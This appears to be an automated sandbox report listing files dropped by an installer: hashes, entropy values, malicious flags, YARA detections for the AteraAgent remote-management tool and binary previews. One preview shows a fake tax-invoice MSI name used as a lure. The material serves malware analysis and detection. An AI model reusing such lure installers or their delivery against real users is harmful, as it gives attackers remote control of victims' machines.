                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):435986
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.651592121918403
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:yt3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4Kse:azOE2Z34KGzOE2Z34K5
                                                                                                                                                                                                                                                                                              MD5:8D37E25AA290892BCEC416FF291B44D2
                                                                                                                                                                                                                                                                                              SHA1:AEF13D6214D2687D983D219CE4E53E5E38D7281B
                                                                                                                                                                                                                                                                                              SHA-256:CF98C4B9CF15A26C1F95211355096534133C6E8E6B74AE3D97DE9B449A2CEDE2
                                                                                                                                                                                                                                                                                              SHA-512:94776E1F82111A9D1F1C2CD39A848A12F60BB2956ABE28884DE3338CFE947C19747BC1FFDF57B87329D43DA452E7F9D6E3C58128BEE90EF70607990E168DC18C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIA7C1.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@r7&Z.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent".APLICATIVO-WINDOWS-NOTA-FISCAL.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}....&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}c.&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}............StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):437217
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.647841120583969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:Zt3jOZy2KsGU6a4Kspt3jOZy2KsGU6a4KsM:XzOE2Z34K+zOE2Z34KR
                                                                                                                                                                                                                                                                                              MD5:1DCCC5659F1BE31C4C2BB1196BDF3F1C
                                                                                                                                                                                                                                                                                              SHA1:646A4C4E2C0D7C7D16DA5375B6A489A078B4E28C
                                                                                                                                                                                                                                                                                              SHA-256:59EF7CC6BD54579FF5B65707EBFD69F7662A515D867A2C1FB5FC42F95F43F92F
                                                                                                                                                                                                                                                                                              SHA-512:D5AE408EE6D2A1A9AA438CB89671D2196705D147A61F26ED489117AEC5B43C041C6F720A2757A9C687798743A5A70DB88DEBFDDD7E9555952AED54E1996BC8E8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSICA70.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@w7&Z.@.....@.....@.....@.....@.....@......&.{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}..AteraAgent..ateraAgentSetup64_1_8_7_2.msi.@.....@.....@.....@........&.{911E9E2F-B38D-4D02-A148-5E49FC9D8943}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[....
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1728014633483967
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:JSbX72Fj1AGiLIlHVRpIh/7777777777777777777777777vDHFzTPrfWrl0i8Q:J3QI5wBTr/F
                                                                                                                                                                                                                                                                                              MD5:2545826F0A5F9227980E1136D426EF8E
                                                                                                                                                                                                                                                                                              SHA1:3F1F6362AF4ACAB6BD41BD460100296A6979F908
                                                                                                                                                                                                                                                                                              SHA-256:206477B502BB5F9017FF0069818E5993F9223F5F5CFD41958DFEA168EF5D7441
                                                                                                                                                                                                                                                                                              SHA-512:B4A29541A955C976553CC0A239243E7A97618E328B289A5B25266789ECA101DD74603F9E5ED4E0F55702FA91497A7AE14B0A5AC30E081FB251E04E69D2FD457B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1742506882225299
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:JSbX72FjuAGiLIlHVRpVh/7777777777777777777777777vDHFJQTI+SRal0i8Q:J8QI5x4h4F
                                                                                                                                                                                                                                                                                              MD5:554453CE18CD9DB6D2FBC705E3A68F20
                                                                                                                                                                                                                                                                                              SHA1:89337ED71BEF52B03E642AFBABB96A02E4367FC8
                                                                                                                                                                                                                                                                                              SHA-256:9B6571383186E1B07D3D2EAC9950B59D048C3DECC9E65E06626823E557B4F73F
                                                                                                                                                                                                                                                                                              SHA-512:CD3F8F71096D94459CC679270CDE91290740807FD1503BDA2DCD0AB725445A78BC327C225066697E70933E4255DC15B3D0FC93E2B4FBF5A5F7C80D6FC4AF9EC4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.6207987421976968
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:W8PhPuRc06WXJEFT5uDKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:phP1HFTQDvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:6C9F273A8707FD4E195FF4F2D79178E2
                                                                                                                                                                                                                                                                                              SHA1:2D675F7C4F6C99B84F9E9AC474E2772E03EA733E
                                                                                                                                                                                                                                                                                              SHA-256:F94292120E245269A40A88370601D3277F4B63CC8650FEE6BE014288291F108E
                                                                                                                                                                                                                                                                                              SHA-512:3CF295A01EEC2777ECA7F1D7F282DF1D65B76EBA48F696E452FFB4302805B069A9D2C6CDAA1249ECC970561C94690418B932C6EE5154D1078D8343DFD2C15A97
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):432221
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.375182910045086
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauh:zTtbmkExhMJCIpErY
                                                                                                                                                                                                                                                                                              MD5:53BBFA7E8BE100F5D91C8E65CC8AAF39
                                                                                                                                                                                                                                                                                              SHA1:5CA1D3EB9DFB905965B7C6231C78A35102568F3A
                                                                                                                                                                                                                                                                                              SHA-256:C64DEEEDC38BD170EC6A95056E25681F8AAE92C81387BCB91337E86E8764E8FC
                                                                                                                                                                                                                                                                                              SHA-512:1C98CD613BDE6C6C41009F20E54F0ECB0E549274D19B3CCB00AAB5BD7F5A320EA52CD72F2C397D43F5897F9227EAD8DBE686886832F9673CA6C7CE8F601A843E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):4926
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.243600050225524
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:FaqdF79/0+AAHdKoqKFxcxkF3/waqdF7OY+AAHdKoqKFxcxkF8O:cEi+AAsoJjykzE7+AAsoJjykB
                                                                                                                                                                                                                                                                                              MD5:2E0A0F5B2D97AB06F04135CB404DC46E
                                                                                                                                                                                                                                                                                              SHA1:0B86C7ADFCCEF61007E702B70EE32D19C41DEF7A
                                                                                                                                                                                                                                                                                              SHA-256:CAAA7F7F87F889FF0760A35D3A9C855CCE48690D88B3B852E406D76C806A4F29
                                                                                                                                                                                                                                                                                              SHA-512:79AA9124BDB52A40CF4B4915C7A99367276F7912A1286AAAE164A9358381D03AC305B3EEFBF85B79E7807573552FE550A96C07D6410BC793DDBCBB983229ED63
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. O.c.t. .. 0.4. .. 2.0.2.3. .1.2.:.0.3.:.4.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):651
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                                                                              MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                                                                              SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                                                                              SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                                                                              SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):704
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.805280550692434
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:tIDRFK4mAX7RBem7hccD+PRem7hUhiiGNGNdg6MhgRBem7hccD+PRem7hUGNGNkm:Us43XVBVhcmMRVhMipNVeBVhcmMRVhro
                                                                                                                                                                                                                                                                                              MD5:EF51E16A5B81AB912F2478FE0A0379D6
                                                                                                                                                                                                                                                                                              SHA1:B0F9E2EE284DD1590EA31B2D3AD736D77B9FC6A7
                                                                                                                                                                                                                                                                                              SHA-256:2C5D5397CEDF66DB724FED7FB4515B026A894F517A0DFBE8AE8ADF52DB61AA22
                                                                                                                                                                                                                                                                                              SHA-512:296A11DB55BFEE7D87897BB63BC9E2C05786D3FD73A894DA5AF76F7A756495C6CCC0959C88844DFB5560DE2374A257201D960E004EC09D8C9DFB50952C5EF2D2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...Running a transacted installation.....Beginning the Install phase of the installation...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Install phase completed successfully, and the Commit phase is beginning...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Commit phase completed successfully.....The transacted install has completed...
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4761
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.945585251880973
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                                                                                                                                                                                                                                                                              MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                                                                                                                                                                                                                                                                              SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                                                                                                                                                                                                                                                                              SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                                                                                                                                                                                                                                                                              SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):471
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.203745451418191
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:J0MgYPq9DW5o7UmhVPqn1qqfucjiIsEnsBeuL3+H1ws3/EcDLPH3Tc8CE6WaVIEz:JyYOK5GLsH6LBx23McHPjcJdWcn
                                                                                                                                                                                                                                                                                              MD5:93540FC05230487C467A36AAFBE3BB8E
                                                                                                                                                                                                                                                                                              SHA1:E9B78901234BB595B31E038A34BDC9FEAB30C36E
                                                                                                                                                                                                                                                                                              SHA-256:1B798BDA44609CC5FDF00E33018EDE7D9E5C7315DB28439E3648D353E45E1269
                                                                                                                                                                                                                                                                                              SHA-512:BCFF33619BA84374A50A77785DB022673F7C59A4ADB9825E856C5F95AC7A3102CFC6F3E9398EBFBF1610A9FA79A623375CEE55170D844C424B0DE56815ED2650
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.632685841945538
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:5o6Tq9UG5h44TUq+aqiBLe1cnpKGaDqsWj7ocolNR5YQJnwFxphxs3PQ8aw:5nGoq+oSWn4p+sWjYl1rxkphxs348aw
                                                                                                                                                                                                                                                                                              MD5:DE33D7F19862684188632305C34A38B1
                                                                                                                                                                                                                                                                                              SHA1:C4916E5F70146DD008CEBB154C0DFB1D7C4A271F
                                                                                                                                                                                                                                                                                              SHA-256:EA05998307AF355C25C30DC2186798D5D19A2AE9D79D7A061C9A4CD101BE68CC
                                                                                                                                                                                                                                                                                              SHA-512:802DC1547C87E1E034B4E6CD25D6E49F9F357299481A905A9522B1163AB45E95D7821BF3774F9CBE42E9BB9355525C492B58D2E11571859D0FF8A229C9B686FE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Certificate, Version=3
